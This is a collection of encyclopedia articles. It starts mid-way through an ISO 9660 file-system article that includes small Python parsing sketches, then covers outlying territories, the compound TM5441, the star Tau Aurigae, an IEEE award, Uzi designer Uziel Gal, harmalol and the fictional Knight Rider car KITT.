drive number to the CD drive. The drive number (for INT 13H) assigned is any of 80hex (hard disk emulation), 00hex (floppy disk emulation) or an arbitrary number if the BIOS should not provide emulation. Emulation is useful for booting older operating systems from a CD, by making it appear to them as if they were booted from a hard or floppy disk. UEFI systems also accept El Torito records, as platform 0xEF. The record is expected to be a disk image containing a FAT filesystem, the filesystem being an EFI System Partition containing the usual directory. The image should be marked for "no emulation", though it does not actually work like the BIOS "no emulation" mode, in which the BIOS would load the image in memory and execute the code from there. El Torito can also be used to produce CDs which can boot up Linux operating systems, by including the GRUB bootloader on the CD and following the Multiboot Specification. While the El Torito spec alludes to a "Mac" platform ID, PowerPC-based Apple Macintosh computers don't use it.
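As an illustration of the El Torito arrangement described above, the following Python sketch walks the volume descriptor set looking for a boot record. The field offsets noted in the comments are assumptions drawn from the El Torito proposal, and the function name is invented for this example:

```python
import struct

SECTOR_SIZE = 2048

def find_boot_catalog(path: str):
    """Return the sector number of the El Torito boot catalog, or None.
    Assumed layout: the boot record is a type-0 volume descriptor whose
    boot system identifier (offset 7) reads "EL TORITO SPECIFICATION";
    a 32-bit little-endian pointer at offset 0x47 gives the catalog's
    absolute sector number."""
    with open(path, "rb") as image:
        image.seek(16 * SECTOR_SIZE)               # skip the system area
        while True:
            sector = image.read(SECTOR_SIZE)
            if len(sector) < SECTOR_SIZE or sector[1:6] != b"CD001":
                return None                        # ran out of descriptors
            if sector[0] == 255:                   # terminator: no boot record
                return None
            if sector[0] == 0 and sector[7:30] == b"EL TORITO SPECIFICATION":
                return struct.unpack_from("<I", sector, 0x47)[0]
```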
Joliet Joliet is an extension specified and endorsed by Microsoft and has been supported by all versions of its Windows operating system since Windows 95 and Windows NT 4.0. Its primary focus is the relaxation of the filename restrictions inherent in full ISO 9660 compliance. Joliet accomplishes this by supplying an additional set of filenames that are encoded in UCS-2BE (UTF-16BE in practice since Windows 2000). These filenames are stored in a special supplementary volume descriptor, which is safely ignored by ISO 9660-compliant software, thus preserving backward compatibility. The specification only allows filenames to be up to 64 Unicode characters in length. However, the documentation for mkisofs states that filenames up to 103 characters in length do not appear to cause problems. Microsoft has documented that it "can use up to 110 characters." The difference lies in whether CDXA extension space is used. Joliet allows Unicode characters to be used for all text fields, which includes file names and the volume name. A "secondary" volume descriptor with type 2 contains the same information as the primary one (sector 16, offset 40 bytes), but in UCS-2BE in sector 17, offset 40 bytes. As a result of this, the volume name is limited to 16 characters. Many current PC operating systems are able to read Joliet-formatted media, thus allowing exchange of files between those operating systems even if non-Roman characters are involved (such as Arabic, Japanese or Cyrillic), which was formerly not possible with plain ISO 9660-formatted media. Operating systems which can read Joliet media include: Microsoft Windows; Microsoft recommends the use of the Joliet extension for developers targeting Windows. Linux macOS FreeBSD OpenSolaris Haiku AmigaOS RISC OS Romeo Romeo was developed by Adaptec and allows the use of long filenames up to 128 characters, written directly into the primary volume descriptor using the current code page. This format is built around the workings of the Windows 9x and Windows NT "CDFS" drivers. When a Windows installation of a different language opens a Romeo disc, the lack of a code page indication will cause non-ASCII characters in file names to become mojibake. For example, "ü" may become "³". A different OS may encounter a similar problem, or refuse to recognize these noncompliant names outright. The same code page problem technically exists in standard ISO 9660, which allows open interpretation of the supplementary and enhanced volume descriptors to any character encoding subject to agreement. However, the primary volume descriptor is guaranteed to use only a small subset of ASCII. Apple extensions Apple Computer authored a set of extensions that add ProDOS or HFS/HFS+ (the primary contemporary file systems for the classic Mac OS) properties to the filesystem. Some of the additional metadata properties include: Date of last backup File type Creator code Flags and data for display Reference to a resource fork In order to allow non-Macintosh systems to access Macintosh files on CD-ROMs, Apple chose to use an extension of the standard ISO 9660 format. Most of the data, other than the Apple-specific metadata, remains visible to operating systems that are able to read ISO 9660.
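A minimal sketch of how Joliet's supplementary volume descriptor and UCS-2BE names might be recognized and decoded follows; the offset of the escape-sequences field (88) is an assumption based on the volume descriptor layout, and the helper names are invented:

```python
JOLIET_ESCAPES = (b"%/@", b"%/C", b"%/E")   # UCS-2 levels 1, 2 and 3

def is_joliet_descriptor(sector: bytes) -> bool:
    """True if a 2048-byte volume descriptor looks like a Joliet
    supplementary volume descriptor: type 2, identifier "CD001", and a
    UCS-2 escape sequence in the escape-sequences field at offset 88."""
    return (sector[0] == 2 and sector[1:6] == b"CD001"
            and sector[88:91] in JOLIET_ESCAPES)

def decode_joliet_name(raw: bytes) -> str:
    """Joliet file identifiers are big-endian UCS-2; decoding them as
    UTF-16BE matches practice since Windows 2000."""
    return raw.decode("utf-16-be")

print(decode_joliet_name(b"\x00R\x00E\x00A\x00D\x00M\x00E"))  # README
```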
Other extensions For operating systems which do not support any extensions, a name translation file TRANS.TBL must be used. The TRANS.TBL file is a plain ASCII text file. Each line contains three fields, separated by an arbitrary amount of whitespace: the file type ("F" for file or "D" for directory); the ISO 9660 filename (including the usually hidden ";1" for files); and the extended filename, which may contain spaces. Most implementations that create TRANS.TBL files put a single space between the file type and the ISO 9660 name, and some arbitrary number of tabs between the ISO 9660 filename and the extended filename. Native support for using TRANS.TBL still exists in many ISO 9660 implementations, particularly those related to Unix. However, it has long since been superseded by other extensions, and modern utilities that create ISO 9660 images either cannot create TRANS.TBL files at all, or no longer create them unless explicitly requested by the user. Since a TRANS.TBL file has no special identification other than its name, it can also be created separately and included in the directory before filesystem creation.
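The three-field TRANS.TBL format just described is simple enough to parse in a few lines. The following Python sketch is illustrative only and assumes well-formed input:

```python
def parse_trans_tbl(text: str) -> dict:
    """Map ISO 9660 names to (type, extended name) pairs from a
    TRANS.TBL file: file type ("F" or "D"), the ISO 9660 name (often
    ending in ";1"), then the extended name, which may contain spaces."""
    entries = {}
    for line in text.splitlines():
        parts = line.split(None, 2)    # split on whitespace, at most 3 fields
        if len(parts) == 3 and parts[0] in ("F", "D"):
            file_type, iso_name, extended_name = parts
            entries[iso_name] = (file_type, extended_name)
    return entries

sample = "F README.TXT;1\tRead Me First.txt\nD SRC\tsource"
print(parse_trans_tbl(sample))
```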
The ISO 13490 standard is an extension to the ISO 9660 format that adds support for multiple sessions on a disc. Since ISO 9660 is by design a read-only, pre-mastered file system, all the data has to be written in one go, or "session", to the medium. Once written, there is no provision for altering the stored content. ISO 13490 was created to allow adding more files to a writeable disc such as a CD-R in multiple sessions. The ISO 13346/ECMA-167 standard was designed in conjunction with the ISO 13490 standard. This new format addresses most of the shortcomings of ISO 9660, and a subset of it evolved into the Universal Disk Format (UDF), which was adopted for DVDs. The volume descriptor table retains the ISO 9660 layout, but the identifier has been updated. Disc images Optical disc images are a common way to electronically transfer the contents of CD-ROMs. They often have the filename extension .iso (.iso9660 is less common, but also in use) and are commonly referred to as "ISOs". Platforms Most operating systems support reading of ISO 9660 formatted discs, and most new versions support the extensions such as Rock Ridge and Joliet. Operating systems that do not support the extensions usually show the basic (non-extended) features of a plain ISO 9660 disc. Operating systems that support ISO 9660 and its extensions include the following: DOS: access with extensions, such as MSCDEX.EXE (Microsoft CDROM Extension), NWCDEX.EXE or CORELCDX.EXE Microsoft Windows 95, Windows 98, Windows ME: can read ISO 9660 Level 1, 2, 3, and Joliet Microsoft Windows NT 4.0, Windows 2000, Windows XP, and newer Windows versions: can read ISO 9660 Level 1, 2, 3, Joliet, and ISO 9660:1999; Windows 7 may also mistake the UDF format for CDFS (for more information see UDF) Linux and BSD: ISO 9660 Level 1, 2, 3, Joliet, Rock Ridge, and ISO 9660:1999 Apple GS/OS: ISO Level 1 and 2 support via the HS.FST File System Translator Classic Mac OS 7 to 9: ISO Level 1, 2; optional free software supports Rock Ridge and Joliet (including ISO Level 3): Joke Ridge and Joliet Volume Access macOS (all versions): ISO Level 1, 2, Joliet and Rock Ridge Extensions; Level 3 is not currently supported, although users have been able to mount these discs AmigaOS: supports the "AS" extensions (which preserve the Amiga protection bits and file comments) QNX ULTRIX OS/2, eComStation and ArcaOS BeOS, Zeta and Haiku OpenVMS: supports only ISO 9660 Interchange levels 1–3, with no extensions RISC OS: support for optical media written on a PC is patchy; most CD-Rs/RWs work perfectly, but DVD±Rs/RWs/RAMs are entirely hit and miss under RISC OS 4.02, RISC OS 4.39 and RISC OS 6.20 See also Comparison of disc image software Disk image emulator List of ISO standards Hybrid CD ISO/IEC JTC 1/SC 23 References Further reading External links This is the ECMA release of the ISO 9660:1988 standard, available as a free download ISOLINUX source code (see isolinux.asm line 294 onward) (see int 13h in interrupt.b, esp. functions 4a to 4d), discusses shortcomings of the standard US Patent 5758352 - Common name space for long and short filenames Amiga APIs Apple Inc. file systems Compact disc Disk file systems Ecma standards 09660 Optical computer storage Optical disc authoring Windows disk file systems
ISO 9660
Technology
6,165
13,535,882
https://en.wikipedia.org/wiki/Outlying%20territory
An outlying territory or separate area is a state territory geographically separated from its parent territory, lying beyond the Exclusive Economic Zone of its parent territory. The tables below list outlying territories marked by distinct, non-contiguous maritime or land boundaries: Outlying geographical regions Outlying territories outside the continent Outlying uninhabited dependent territories Outlying dependent territories and areas of special sovereignty Notes 1. Enclaves are not included. 2. Disputed outlying territories in the Spratly Islands are not included. See also List of sovereign states List of dependent territories External links Maritime boundaries Countries’ EEZ Wiktionary-outlying A European outlying territory Map of Spratly Islands Borders Dependent territories
Outlying territory
Physics
133
74,735,914
https://en.wikipedia.org/wiki/TM5441
TM5441 is a drug which acts as an inhibitor of the serpin protein plasminogen activator inhibitor-1 (PAI-1). By inhibiting PAI-1, it increases the activity of the enzymes tissue plasminogen activator and urokinase, which break down blood clots as part of the fibrinolytic system. It has been researched for conditions such as hepatic steatosis and diabetic nephropathy, and while it has not been developed for medical use, it is widely used in scientific research. References Chloroarenes Benzoic acids 3-Furyl compounds Anilides Ethers
TM5441
Chemistry
136
2,898,697
https://en.wikipedia.org/wiki/Tau%20Aurigae
Tau Aurigae, Latinized from τ Aurigae, is a star in the northern constellation Auriga. It is visible to the naked eye with an apparent visual magnitude of 4.505, and is approximately distant from Earth. Tau Aurigae is an evolved giant star with a stellar classification of G8 III. It has expanded to 11 times the radius of the Sun and shines with 63 times the Sun's luminosity. This energy is radiated into outer space from the outer atmosphere at an effective temperature of 4,887 K, which gives it the yellow-hued glow of a G-type star. References External links HR 1995 CCDM J05492+3911 Image Tau Aurigae 038656 027483 Aurigae, Tau Auriga G-type giants Aurigae, 29 1995 BD+39 1418
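The quoted radius, luminosity and effective temperature in the article above are mutually consistent under the Stefan-Boltzmann law, as a short illustrative Python check shows (the solar effective temperature of 5,772 K is an assumed reference value):

```python
# L / Lsun = (R / Rsun)**2 * (T / Tsun)**4, from the Stefan-Boltzmann law
r_ratio = 11.0      # radius in solar radii, as quoted above
t_eff = 4887.0      # effective temperature in kelvins, as quoted above
t_sun = 5772.0      # assumed solar effective temperature

luminosity_ratio = r_ratio**2 * (t_eff / t_sun)**4
print(f"{luminosity_ratio:.0f} Lsun")   # ~62, consistent with the quoted 63
```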
Tau Aurigae
Astronomy
188
12,953,377
https://en.wikipedia.org/wiki/IEEE%20Lotfi%20A.%20Zadeh%20Award%20for%20Emerging%20Technologies
The IEEE Lotfi A. Zadeh Award for Emerging Technologies (until 2020 the IEEE Daniel E. Noble Award) is a Technical Field Award of the IEEE for contributions to emerging technologies. The award is named after the Azerbaijani-American mathematician Lotfi A. Zadeh. The award was established by the IEEE Board of Directors in 2000, replacing the prior IEEE Morris N. Liebmann Memorial Award. The award may be presented to an individual or a team of up to three people. Recipients receive a bronze medal, certificate and honorarium. Recipients 2020: Miroslav Micovic 2019: Thomas Kenny 2018: Rajiv Joshi 2017: Miguel A. L. Nicolelis 2016: Mark G. Allen (USA) 2015: Khalil Najafi 2014: Gabriel M. Rebeiz 2013: Jan P. Allebach 2012: Subramanian S. Iyer 2011: Mark L. Burgener 2011: Ronald E. Reedy (USA) 2010: Shinichi Abe 2010: Shoichi Sasaki 2010: Takehisa Yaegashi (Japan) 2009: Larry F. Weber (USA) 2008: James M. Daughton 2008: Stuart Parkin (UK) 2008: Saied Tehrani 2007: Stephen R. Forrest 2007: Richard H. Friend 2007: Ching W. Tang (USA) 2006: Carlos A. Paz de Araujo (Brazil) 2005: David L. Harame 2004: Larry J. Hornbeck 2003: 2002: Masataka Nakazawa 2001: Katsutoshi Izumi 2000 and earlier: See IEEE Morris N. Liebmann Memorial Award References External links IEEE Daniel E. Noble Award for Emerging Technologies List of recipients of the IEEE Daniel E. Noble Award for Emerging Technologies Daniel E. Noble Award
IEEE Lotfi A. Zadeh Award for Emerging Technologies
Technology
358
290,146
https://en.wikipedia.org/wiki/Uziel%20Gal
Uziel "Uzi" Gal (, born Gotthard Glas; 15 December 1923 – 7 September 2002) was a German-born Israeli firearm designer who invented and became the eponym of the Uzi submachine gun. Biography Gal was born in Weimar, Germany to Miele and Erich Glas. When the Nazis came to power in 1933, he first moved to the United Kingdom and later in 1936 to Kibbutz Yagur in the British Mandate of Palestine, where he changed his name to Uziel Gal. In 1943, he was arrested for illegally carrying a gun and was sentenced to six years in prison. However, he was pardoned and released in 1946 (serving less than half of his sentence). Gal began designing the Uzi submachine gun shortly after the founding of Israel and the 1948 Arab–Israeli War. In 1951, it was officially adopted by the Israel Defense Forces and was called the Uzi after its creator. Gal did not want the weapon to be named after him but his request was denied. In 1955, he was decorated with the Tzalash haRamatkal and in 1958, Gal was the first person to receive the Israel Security Award, presented to him by Prime Minister David Ben-Gurion for his work on the Uzi. Gal retired from the IDF in 1975, and moved to the United States the following year. He settled in Philadelphia so that his daughter, Tamar, who had serious brain damage, could receive extended medical treatment there. In the early 1980s, Gal assisted in the creation of the Ruger MP9 submachine gun. Gal also assisted film-actors like Linda Hamilton and Robert Patrick in their training to use automatic weapons in their movie roles. Gal continued his work as a firearms designer in the United States until his death from cancer in 2002. His body was flown back to Yagur for burial. References External links Uziel Gal biography by his son, Iddo Gal 1923 births 2002 deaths Weapon designers Weapon design Firearm designers Israeli military personnel Israeli colonels Israel Defense Prize recipients Deaths from cancer in Pennsylvania Recipients of British royal pardons Jewish emigrants from Nazi Germany to the United Kingdom Inmates of Acre Prison Jewish emigrants from Nazi Germany to Mandatory Palestine Israeli inventors Israeli emigrants to the United States Israeli people of German-Jewish descent People convicted of illegal possession of weapons
Uziel Gal
Engineering
476
5,107,070
https://en.wikipedia.org/wiki/Harmalol
Harmalol is a bioactive beta-carboline and a member of the harmala alkaloids. Legal status Australia Harmala alkaloids are considered Schedule 9 prohibited substances under the Poisons Standard (October 2015). A Schedule 9 substance is a substance which may be abused or misused, the manufacture, possession, sale or use of which should be prohibited by law except when required for medical or scientific research, or for analytical, teaching or training purposes with approval of Commonwealth and/or State or Territory Health Authorities. See also 9-Me-Bc DMT References Tryptamine alkaloids Beta-Carbolines
Harmalol
Chemistry
130
1,829,947
https://en.wikipedia.org/wiki/KITT
KITT or K.I.T.T. is the common name of two fictional characters from the action franchise Knight Rider. In both instances, KITT is an artificially intelligent electronic computer module in the body of a highly advanced, very mobile, robotic automobile. The original KITT is known as the Knight Industries Two Thousand, which appeared in the original TV series Knight Rider as a 1982 Pontiac Firebird Trans Am. The second KITT is known as the Knight Industries Three Thousand, which appeared first in the two-hour 2008 pilot film for a new Knight Rider TV series and then the new series itself, and appeared as a 2008–2009 Ford Shelby GT500KR. During filming, KITT was voiced by a script assistant, with voice actors recording KITT's dialog later. David Hasselhoff and original series voice actor William Daniels first met each other six months after the series began filming. KITT's nemesis is KARR, whose name is an acronym of Knight Automated Roving Robot. KARR was voiced first by Peter Cullen and later by Paul Frees in seasons one and three, respectively, of the NBC original TV series Knight Rider. A 1991 sequel film, Knight Rider 2000, is centered on KITT's original microprocessor unit transferred into the body of the vehicle intended to be his successor, the Knight Industries Four Thousand (Knight 4000), voiced by Carmen Argenziano and William Daniels. Val Kilmer voiced KITT in the 2008–2009 Knight Rider series. Knight Industries Two Thousand (KITT) In the original Knight Rider series, the character of KITT (Knight Industries Two Thousand) was physically embodied as a modified 1982 Pontiac Trans Am. KITT was designed by customizer Michael Scheffe. The convertible and super-pursuit KITTs were designed and built by George Barris. Development In the history of the television show, the first KITT, voiced by William Daniels, was said to have been designed by the late Wilton Knight, a brilliant but eccentric billionaire, who established the Foundation for Law and Government (FLAG) and its parent Knight Industries. The 2008 film implies that Charles Graiman, creator of the Knight Industries Three Thousand, also had a hand in designing the first KITT. An unknown number of KITT's systems were designed at Stanford University. KITT's total initial production cost was estimated at $11,400,000 in 1982 (Episode 5, "Just My Bill"). The 1991 movie Knight Rider 2000 saw the first KITT (Knight Industries Two Thousand) in pieces, and Michael Knight himself reviving the Knight 2000 microprocessor unit, which is eventually transferred into the body of the vehicle intended to be the original KITT's direct successor, the Knight 4000. The new vehicle was a modified 1991 Dodge Stealth, appearing similar to the Pontiac Banshee prototype. In the 1997–1998 spin-off series Team Knight Rider, KITT is employed as a shadow advisor. It is later revealed that "The Shadow" is actually a hologram run by KITT. In "Knight of the Living Dead", Graiman states a third KITT exists as a backup. When KITT is about to die, his memories are downloaded so the third KITT can use them. However, the third backup is never used. While both the 2008 film and the reboot series appear to be a revamp of the original series, they offer some continuity from the original. The "new" or "second" KITT (Knight Industries Three Thousand) is a different vehicle and microprocessor unit. In Knight Rider 2000, it is stated that most of the Knight 2000 parts had been sold off. 
However, Graiman's garage in the 2008 film shows a more complete collection of parts than in the boxes recovered by Michael Knight in Knight Rider 2000. The original Knight Industries Two Thousand is also shown in the pilot movie (although in pieces) in the scene where the garage of Charles Graiman (creator of the Knight Industries Three Thousand and implied co-designer of the original KITT) is searched by antagonists. A Trans-Am body (without its hood) is partially covered by a tarp, on which rests the rear spoiler. The famous KITT steering wheel (labelled "Knight Two Thousand") and "KNIGHT" license plate are also shown, along with numerous black muscle car body parts. When the camera shows a full scene of the garage, there are four other Knight Two Thousand cars stored there: one has been taken apart, while the other three are complete. If the video is paused at the right moment, all four cars are visible. Features AI personality and communication According to the series, the original KITT's main cybernetic processor was first installed in a mainframe computer used by the US government in Washington, D.C. However, Wilton saw better use for "him" in the Foundation's crime-fighting crusade and eventually this AI system was installed in the vehicle. KITT is an advanced supercomputer on wheels. The "brain" of KITT is the Knight 2000 microprocessor, which is the centre of a "self-aware" cybernetic logic module. This allows KITT to think, learn, communicate and interact with humans. He is also capable of independent thought and action. He has an ego that is easy to bruise and displays a very sensitive, but kind and dryly humorous personality. According to Episode 55, "Dead of Knight", KITT has 1,000 megabits of memory with one nanosecond access time. According to Episode 65, "Ten Wheel Trouble", KITT's future capacity is unlimited. KITT's serial number is AD227529, as mentioned in Episode 31, "Soul Survivor". KITT's Voice (Anharmonic) Synthesizer (for speech) and Etymotic Equalizer (audio input) allow his logic module to speak and communicate. With it, KITT can also simulate other sounds. KITT's primary spoken language was English; however, by accessing his language module, he can speak fluently in Spanish, French and many other languages. The module can be adjusted, giving KITT different accents, as in Episode 82, "Out of the Woods", where KITT uses a "New York City" accent and calls Michael "Micky". During the first season, KITT's "mouth" in the interior of the vehicle was indicated by a flashing red square. In episode 14 "Heart of Stone", this was changed to three sectioned vertical bars, as this design proved popular with fans as part of KARR. KITT can also project his voice as a loudspeaker or as a form of ventriloquism (First used in Episode 48, "Knight of the Drones, Pt. 2"). KITT has a hidden switch and setting dial under the dash that either completely shuts down his AI module or deactivates certain systems should the need arise. First used in Episode 17, "Chariot of Gold". He also has a function which can be activated in order to completely lock the AI from all the vehicle controls, such as preventing KITT from activating Auto Cruise. KITT is still able to protest such actions vocally. First used in Episode 8, "Trust Doesn't Rust". KITT is in constant contact with Michael via a comlink through a two-way communication wristwatch (a modified '80s LCD AM radio watch) Michael wore. The watch also has a micro camera and scanner that KITT can access to gather information.
In an emergency, Michael can activate a secret homing beacon hidden inside a gold pendant he wears around his neck. The beacon sends a priority signal that can remotely activate KITT, even if KITT were deactivated, and override his programming so that he rushes to Michael's aid. Used in Episode 42, "A Good Knight's Work" and in "Knights of the Fast Lane". Scanning and microwave jamming KITT has a front-mounted scanner bar called the Anamorphic Equalizer. The device is a fibre-optic array of electronic eyes. The scanner can see in all visual wavelengths, as well as X-ray and infrared. Its infrared Tracking Scope can monitor the position of specific vehicles in the area within 10 miles. The scanner is also KITT's most vulnerable area. Occasionally, the bar can pulse in different patterns and sweep rapidly or very slowly. Glen A. Larson, the creator of both Knight Rider and Battlestar Galactica, has stated that the scanner is a nod to the Battlestar Galactica characters, the Cylons, and even used the iconic Cylon eye scanner audio to that effect. He stated that the two shows have nothing else in common and, to remove any fan speculation, said in the Season One Knight Rider DVD audio commentary that he simply reused the scanning light for KITT because he liked the effect. KITT also has an array of tiny audio and visual microscanners and sensors threaded throughout his interior and exterior which allows for the tracking of anything around the car. KITT can also "smell" via an atmospheric sampling device mounted in his front bumper. When scanning in Surveillance Mode: KITT could detect people and vehicles and track their movements and discern proximity. KITT could gather structural schematics of buildings, vehicles, or other devices and help Michael avoid potential danger when he was snooping. KITT could monitor radio transmissions and telephone communications within a location and trace those calls. KITT could tap into computer systems to monitor, or upload and download information as long as he could break the access codes. KITT's other sensors include: a medical scanner that includes an electrocardiograph (EKG). The medical scanner can monitor the vital signs of individuals and display them on his monitors. It can indicate whether they are injured, poisoned, or undergoing stress or other emotional strain (First used in Episode 1, "Knight of the Phoenix (Pt. 2)"); a Voice Stress Analyzer which can process spoken voices and determine if someone may be lying (First used in Episode 26, "Merchants of Death"); and a bomb sniffer module that can detect explosives within a few yards of the vehicle (First used in Episode 25, "Brother's Keeper"). KITT has a microwave jamming system that plays havoc on electrical systems. This lets him take control of electronic machines, allowing things like cheating at slot machines, breaking electronic locks, fouling security cameras, and withdrawing money from ATMs. KITT can also use microwaves to heat a vehicle's brake fluid, causing it to expand and thus apply the brakes of the car. In Episode 26, "Merchants of Death", the microwave system's power was increased to three times its normal strength, strong enough to bring down a helicopter at a limited distance. Engine and driving KITT is powered by the Knight Industries turbojet engine, with modified afterburners and a computer-controlled 8-speed turbo-drive transmission. This helps him accelerate from 0–60 mph in 2 seconds (1.37g) and cover the standing quarter mile in 4.286 seconds.
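The parenthetical g-force figure follows directly from the quoted 0–60 mph time, as a purely illustrative Python check of the fictional specification shows:

```python
MPH_TO_MS = 0.44704   # metres per second per mile per hour
G = 9.80665           # standard gravity in m/s^2

acceleration = 60 * MPH_TO_MS / 2.0   # 0-60 mph in 2 seconds
print(f"{acceleration / G:.2f} g")    # prints "1.37 g", matching the text
```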
Electromagnetic hyper-vacuum disc brakes: 14 foot (4.25 m) braking distance (70–0 mph – 112–0 km/h – 11.7g). KITT primarily uses hydrogen fuel. However, his complex fuel processor allows him to run on any combustible liquid, even regular gasoline. In one episode, KITT mentioned his fuel economy was at least 65 miles per gallon. However, when operating on fuels other than liquid hydrogen, KITT's fuel efficiency and power output may be lowered. Used in most episodes, KITT can employ a "turbo boost". This is a pair of rocket boosters mounted just behind the front tires. These lifted the car, allowing KITT to jump into the air and pass over obstacles in the road. Also, occasionally, Turbo Boost was used to allow KITT to accelerate to incredible speeds in excess of 200 mph (322 km/h). The boosters could fire forward or backward, although the backward booster was rarely used. In later seasons, a passive laser restraint system helped protect Michael and any passengers from the shock of sudden impacts and hard stopping. It is speculated that this is a primitive form of an inertial damping device. First used in Episode 47, "Knight of the Drones". KITT has four main driving modes: Normal cruise – On "Normal", Michael has control of the car. In an emergency, KITT can still take over and activate Auto Cruise mode. Auto cruise – KITT has an "Alpha Circuit" as part of his main control system, which allows the CPU to drive the car utilizing an advanced Auto Collision Avoidance system. KARR's Alpha Circuit was damaged due to being submerged in water for a time, which required him to have an operator to control his Turbo Boost function. Pursuit mode – "Pursuit" is used during high-speed driving and is a combination of manual and computer assisted operation. KITT could respond to road conditions faster than Michael's reflexes could; however, Michael was technically in control of the vehicle and KITT helped guide certain maneuvers. Silent mode – The feature dampens his engine noise and allows him to sneak around. First used in Episode 37, "White-Line Warriors". Other vehicle modes included: a two-wheel ski drive, which allowed KITT to "ski" (driving up on two wheels) on either left or right side (First used in Episode 1, "Knight of the Phoenix"); an aquatic synthesizer which allows KITT to hydroplane, effectively "driving" on water, using his wheels and turbo system for propulsion (First used in Episode 28, "Return to Cadiz"), but which was removed by the end of the episode because it was faulty; and a High Traction Drop Downs (HTDD) system which hydraulically raises KITT's chassis for better traction when driving off-road (First used in Episode 39, "Speed Demons"). Internal features Dashboard equipment KITT has two CRT video display monitors on his dash. KITT later only has one when his dash was redesigned by Bonnie for the show's third season. Michael can contact home base and communicate with Devon and others by way of a telephone comlink using KITT's video display. The video display is also used for the Graphic Translator system (which sketches likenesses from verbal input to create a Facial composite), as well as for scanning or analysis results. KITT can also print hard copies of data on a dashboard-mounted printer (First used in Episode 15, "The Topaz Connection"). KITT has an Ultraphonic Chemical Analyzer scanning tray which can analyze the chemical properties of various materials. It can even scan fingerprints and read ballistic information off bullets and compare these with a police database. 
The system can also analyze chemical information gathered from KITT's exterior sensors (First used in Episode 17, "Chariot of Gold"). KITT also has an in-dash entertainment system that can play music and video, and run various computer programs including arcade games. KITT can dispense money to Michael when he needed it (First used in Episode 59, "Knight by a Nose"). Driver compartment KITT has two front ejection seats, mostly used when Michael needed a boost to fire escapes or rooftops. First used in Episode 1, "Knight of the Phoenix (Pt. 1)". KITT can release oxygen into his driver compartment and provide air to passengers if he was ever submerged in water or buried in earth. This is also used to overcome the effects of certain drugs (First used in Episode 5, "Slammin' Sammy's Stunt Show Spectacular".) KITT could spray a gas into the driver compartment that could render an unwanted occupant unconscious. KITT could also expel all breathable air from the driver compartment; however, only KARR ever threatened to use it to harm someone. KITT used this to rid the compartment of smoke after bombs were detonated in his trunk. External features KITT is equipped with "Tri-Helical Plasteel 1000 MBS" (Molecular Bonded Shell) plating which protects him from almost all forms of conventional firearms and explosive devices. He can only be harmed by heavy artillery and rockets, and even then, the blast usually left most of his body intact and only damaged internal components. This makes KITT's body durable enough to act as a shield for explosives, ram through rigid barriers of strong material without suffering damage himself and sustain frequent long jumps on turbo boost with no fear for the vehicle's structural integrity being damaged upon landing. The shell also protected him from fire. However, it was vulnerable to electricity, as seen in the episode "Lost Knight" (season 3 episode 10), when a surge of electricity shorted out his memory. The shell was also vulnerable to some potent acids and, in episode 70 "Knight Of The Juggernaut", a formula was made (with knowledge of the shell's chemical base) to neutralize it completely. The shell offers little to almost no protection from lasers in certain episodes. The shell is a combination of three secret substances together referred to as the Knight Compound, developed by Wilton Knight, who entrusted parts of the formula to three separate people, who each know only two pieces of the formula. The shell provided a frame tolerance of 223,000 lb (111.5 tons) and a front and rear axle suspension load of 57,000 lb (28.5 tons). In the pilot, "Knight of the Phoenix", the shell is described as the panels of the car itself; in later episodes, especially from season two onward, the idea of the shell being applied to a base vehicle chemically is used. KITT is also protected by a thermal-resistant Pyroclastic lamination coating that can withstand sustained temperatures of up to 800 degrees Fahrenheit (426 °C). First used in Episode 32, "Ring of Fire". KITT can tint the windshield and windows to become opaque (First seen in Episode 14, "Give Me Liberty... or Give Me Death") and can also deflate and re-inflate his tires (First used in Episode #5 "Slammin' Sammy's Stunt Show Spectacular"). KITT's tires can produce traction spikes that allow KITT to overcome steep terrain. First seen in Episode 86 "Hills of Fire". KITT can automatically open and close his doors, windows, hood, trunk, and T-tops. 
He can also lock his doors to prevent unauthorized entry into his driver compartment. KITT can also rotate his "KNIGHT" license plate to reveal a fictitious one reading "KNI 667"; Michael used this to evade police when an APB was placed on him. First used in Episode 25, "Brother's Keeper". KITT's headlights can flash red and blue like police lights, and he has a siren. First used in Episode 38, "Race for Life". KITT is equipped with a parachute. First used in Episode 23, "Goliath Returns (Pt. 1)". KITT can launch magnesium flares, which can also be used to divert heat-seeking missiles fired at him. First used in Episode 26, "Merchants of Death". KITT has twice been fitted with a high-powered, ultra-frequency-modulated resonating laser capable of burning through steel plating. First used in Episode 9, "Trust Doesn't Rust", where it was used in an attempt to destroy KARR by hitting KARR's only weak spot. Until the laser was calibrated, KITT could not fire it himself; it could only be fired by KITT's technician Bonnie. As also pointed out in "Trust Doesn't Rust", firing the laser more than twice at that time would drain KITT's batteries. Later, in "Goliath", part 2, KITT was fitted with a more user-friendly laser power pack, which he uses to disable the monstrous 18-wheeler. Equipment in or under the bumpers KITT has a hidden winch and grappling hook system. Most often the hook is connected by a strong cable, but a metal arm has also been seen. The grappling hook is first used in Episode 6, "Not a Drop to Drink"; the winch is first used in Episode 13, "Forget Me Not". Under the front bumper there is an induction coil that can extend; when it touches a metal object, KITT can remotely induce an electrical voltage or current in that object. First used in "Knight of the Drones (Part I)" to electrify a fence in order to incapacitate two thugs without seriously harming them. From under the rear bumper, KITT can spray a jet of oil, creating an oil slick, or emit a plume of smoke, creating a smoke screen (both first used in Episode 1, "Knight of the Phoenix"). KITT can also dispense a cloud of tear gas along with his smoke screen (First used in Episode 13, "Hearts of Stone"). There are flame throwers mounted under the bumpers. First used in Episode 2, "Deadly Maneuvers". KITT can put out small fires with a sprayer in his bumpers. Fourth season update During the first episode of the fourth season, "Knight of the Juggernaut, Part I", KITT's Molecular Bonded Shell is intentionally neutralized by a sprayed combination of chemicals, and KITT is nearly destroyed by the Juggernaut, a custom-designed armored vehicle. KITT is redesigned, repaired and rebuilt in "Knight of the Juggernaut, Part II". One main feature of the redesign is the addition of Super-Pursuit Mode, consisting of improved rocket boosters for enhanced acceleration, retractable spoilers for aerodynamic stability, and movable air inlets for increased cooling. Super-Pursuit Mode provides a 40% boost in speed beyond the car's original top speed of 300 mph. When Super-Pursuit Mode is used at night, parts of the exterior and the areas under the wheel arches glow red. The redesign also includes an emergency braking system which slows KITT down from Super-Pursuit speeds by using a forward braking booster and air panels that pop out to create air friction. While KITT's initial roof was a T-top, the redesigned KITT has a convertible roof; Michael can bring the top down by pressing the "C" button on KITT's dash. F.L.A.G.
